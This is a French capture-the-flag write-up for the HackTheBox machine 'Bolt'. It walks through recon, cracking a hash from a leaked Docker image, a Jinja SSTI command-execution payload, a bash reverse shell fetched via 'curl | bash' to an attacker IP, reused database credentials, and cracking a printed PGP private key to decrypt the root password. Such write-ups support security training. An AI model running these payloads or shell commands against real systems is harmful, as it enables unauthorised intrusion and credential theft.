Bolt HackTheBox (Writeup)

Skills:

Information Leakage
Subdomain Enumeration
SSTI (Server Side Template Injection)
Abusing PassBolt
Abusing GPG

Reconnaissance:

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap:

nmap -p- --open -sS -Pn -n --min-rate 5000 -vvv 10.10.11.114 -oG allPorts

Analyse des ports ouverts avec extractPorts:

Utilisation de la fonction extractPorts pour afficher de manière synthétique les ports ouverts et les copier dans le clipboard (22,80,443)

Scan de la version des ports avec Nmap:

Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p22,80,443 10.10.11.114 -oN targeted

Pour résoudre les noms de domaine en adresses IP via DNS, on insère dans le fichier /etc/hosts le nom de domaine associé à son adresse IP.

Port 80

Nous tentons de créer un compte, mais recevons une erreur "Internal Server Error".

Énumération des utilisateurs possibles :

Joseph Garth
Bonnie Green
Jose Leos

Nous nous voyons proposer de télécharger une image Docker .tar, incluant un package web de base pour démarrer un projet avec un design élégant.

Recherche de répertoires :

Nous effectuons une recherche de répertoires avec gobuster :

gobuster dir -u http://bolt.htb  -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100

Rien d'intéressant n’est trouvé.

Recherche de sous-domaines :

Nous recherchons des sous-domaines avec gobuster :

gobuster vhost -u http://bolt.htb  --append-domain -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 100

Sous-domaines trouvés :

demo.bolt.htb
mail.bolt.htb

Nous les ajoutons au fichier /etc/hosts.

http://mail.blolt.htb

http://demo.bolt.htb:

Information Leakage (image.tar)

Nous cherchons des informations sensibles dans le fichier Docker .tar qui contient des dossiers avec un fichier json, un fichier layer.tar et une version.

Extraction des fichiers :

Nous extrayons les fichiers de layer.tar comme suit :

mkdir extracted_layers

find . -name "layer.tar" -exec tar -xvf {} -C extracted_layers \;

Nous ouvrons la base de données db.sqlite3 :

sqlite3 db.sqlite3 

.tables
Select * from user

Nous trouvons un utilisateur admin avec un mot de passe hashé :

id: Identifiant unique de l'utilisateur.
username: Nom d'utilisateur (admin dans ce cas).
email: Adresse email associée ([email protected]).
password: Mot de passe hashé ($1$sm1RceCh$rSd3PygnS/6jlFDfF2J5q.).

Nous décryptons le mot de passe avec john :

john --wordlist=/usr/share/wordlists/rockyou.txt hash

admin:deadbolt

Nous nous connectons au panneau d'administration mais ne trouvons rien d'intéressant, sauf qu’il utilise Flask.

Recherche du code d'invitation :

Nous recherchons le code d'invitation dans les fichiers extraits :

grep -ri "invite_code" .

Un fichier Python contient le code d’invitation :

XNSS-HSJW-3NGU-8XTJ

Nous créons un nouveau compte utilisateur jordan avec le mot de passe Jordan1234, puis nous avons accès à la boîte de réception et à la démo du panneau admin.

user: jordan
password: Jordan1234

Vulnérabilité SSTI :

En observant la configuration, nous remarquons que si nous changeons notre nom de configuration, un email de confirmation est envoyé. Cela peut être une opportunité pour une attaque SSTI.

Nous testons avec un payload typique :

{{ 9*9 }}

Si le résultat est 81, l'application est vulnérable.

Nous confirmons que l'application est vulnérable et testons l'injection de commandes avec un payload issu de payloadallthethings :

GitHub - swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTFGitHub

Commande ID:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

Nous réussissons à exécuter une reverse shell en écoutant sur le port 443 :

nc -nlvp 443

Nous créons un fichier index.html avec le contenu suivant pour exécuter une reverse shell

#!/bin/bash 
bash -i >& /dev/tcp/10.10.14.3/443 0>&1

Puis nous démarrons un serveur HTTP avec Python :

python3 -m http.server 80

Nous envoyons le payload avec curl pour récupérer et exécuter la commande :

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl 10.10.14.3 | bash').read() }}

Traitement de la terminal :

script /dev/null -c bash
#contrôle Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184

Cela permettra de travailler de manière beaucoup plus efficace et surtout plus confortable.

Élévation de privilège :

En tant qu'utilisateur www-data, nous tentons d'élever nos privilèges pour obtenir un accès root.

Énumération initiale avec LinPEAS

Vous avez utilisé LinPEAS pour identifier les failles potentielles du système.

Releases · peass-ng/PEASS-ngGitHub

Commandes exécutées :

python3 -m http.server 555

wget http://10.10.14.3:555/linpeas.sh

LinPEAS a révélé un fichier de configuration contenant des informations sensibles :

/etc/passbolt/passbolt.php

host :localhost
port : 3306
username : passbolt
password : rT2;jW7<eY8!dX8}pQ8%
database : passboltdb

Connexion à la base de données MySQL

Utilisation des informations pour se connecter à la base de données :

mysql -h localhost -P 3306 -u passbolt -p 

rT2;jW7<eY8!dX8}pQ8%

Analyse des tables dans la base de données

users : Contient des utilisateurs.

id

role_id

username

active

deleted

created

modified

4e184ee6-e436-47fb-91c9-dccb57f250bc

1cfcd300-0664-407e-85e6-c11664a7d86c

[email protected]

2021-02-25 21:42:50

2021-02-25 21:55:06

9d8a0452-53dc-4640-b3a7-9a3d86b0ff90

975b9a56-b1b1-453c-9362-c238a85dad76

[email protected]

2021-02-25 21:40:29

2021-02-25 21:42:32

secrets : Messages chiffrés (potentiellement exploitables plus tard).

gpgkeys : Contient des clés publiques (peut être utilisé dans certains scénarios).

Tentative de connexion avec eddie :

su eddie

Mot de passe : rT2;jW7<eY8!dX8}pQ8%
Accès à l'utilisateur eddie obtenu

Flag user.txt :)

Réutilisation de LinPEAS (user eddie)

Après avoir obtenu l'accès à l'utilisateur eddie, nous réutilisons LinPEAS pour explorer le système à la recherche de potentielles clés SSH ou d'autres indices utiles.

Fichier trouvé : Un fichier de journal contenant des clés SSH potentielles :

/home/eddie/.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log

Décryptage message avec GPG

Clé privée GPG : Nous utilisons l'outil GPG pour importer la clé privée et tenter de déchiffrer le message chiffré dans la table secrets de la base de données passboltdb.

-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: OpenPGP.js v4.10.9
Comment: https://openpgpjs.org

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
PSwYYWlAywj5
=cqxZ
-----END PGP PRIVATE KEY BLOCK-----

Extraction du hash de la clé privée

Pour pouvoir utiliser la clé privée, nous devons d'abord obtenir son hash. Nous utilisons l'outil gpg2john pour extraire le hash de la clé privée :

gpg2john private.key > hash

Brute force du mot de passe de la clé privée avec john

Nous utilisons John the Ripper pour effectuer une attaque par dictionnaire et découvrir le mot de passe de la clé privée. Nous utilisons la liste de mots rockyou.txt pour cela :

john -wordlist=/usr/share/wordlists/rockyou.txt hash

Mot de passe trouvé : merrychristmas

Importation de la clé privée et décryptage du message

Nous importons la clé privée avec gpg

gpg --import private.key

Puis, nous décryptons le message chiffré (probablement contenu dans le fichier message.txt récupéré de la base de données secrets) :

gpg --decrypt message.txt

Mot de passe de root trouvé : Z(2rmxsNW(Z?3=p/9s

Flag root.txt

Mis à jour il y a 1 an

Ce contenu vous a-t-il été utile ?